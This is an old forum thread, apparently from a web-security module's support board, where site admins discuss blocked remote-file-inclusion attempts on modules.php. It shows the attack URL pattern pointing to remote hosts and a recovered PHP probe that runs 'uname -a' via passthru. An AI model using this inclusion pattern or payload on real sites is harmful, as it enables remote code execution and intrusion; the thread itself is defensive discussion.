Repeated attacks starting yesterday blocked by Sentinel

Site Admin Joined: Jun 04, 2004 Posts: 6433

Since yesterday, several sites have been attacked from 3 different IPs using a similar attack. Sentinel blocks this with the Filter blocker.

The form of the attack looks like the following (where I show IP below, there is actually an IP address followed by a slash, a cryptic directory name, and a question mark):

modules.php?name=IP&file=IP&mode=IP&t=IP

I'm guessing the webmasters of these sites (e.g. one is a church, another is a porn site) don't know that their sites are being used to host this attack (at least not the church, which I notified) or that the cryptic directory and index.php inside it have been created there.

What is the attack trying to accomplish?

Posted: Thu Sep 23, 2004 3:04 pm

They actually got blocked on my sites due to their use of curl which matched a Harvester string. The hack attempts came from Netherlands and Spain IP addresses.

I was able to download one of the files that was used in the hack attempt, and it contained:

Code:

<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>

Posted: Thu Sep 23, 2004 4:08 pm

This sounds alot like the rash of hack attempts that used a whatever.gif? in the iped http address. If I'm not mistaken one of them was a script to try and rape your author db, another was a script to try and rape your user db, and the others God only knows what they were Sad